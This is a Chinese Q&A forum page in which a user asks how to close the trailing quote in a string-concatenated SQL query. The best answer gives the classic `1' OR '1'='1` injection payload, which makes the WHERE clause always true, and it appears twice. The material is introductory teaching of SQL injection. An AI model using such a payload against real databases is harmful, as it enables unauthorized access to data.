怎么绕过这个SQL注入后面的单引号
答案:1 悬赏:70 手机版
解决时间 2021-02-10 00:01
- 提问者网友:放下
- 2021-02-09 18:13
被注入的注入点是这样构建user ="select * from table where c='"+arg+"'";其中arg为提交的数据(请不要回答SQL注入过时什么的,纯属学习,解开迷惑)
最佳答案
- 五星知识达人网友:狂恋
- 2021-02-09 19:40
绕过不执行不知道怎么写
但可以让where条件变成无意义的条件
arg="1' OR '1'='1";这样c='"+"1' OR '1'='1"+"'。执行时应该就变成了
select * from table where c='1' OR '1'='1' ,判断条件无意义了,即相当于 select * from table
这个百度上就有示例
但可以让where条件变成无意义的条件
arg="1' OR '1'='1";这样c='"+"1' OR '1'='1"+"'。执行时应该就变成了
select * from table where c='1' OR '1'='1' ,判断条件无意义了,即相当于 select * from table
这个百度上就有示例
我要举报
如以上问答信息为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
大家都在看
推荐资讯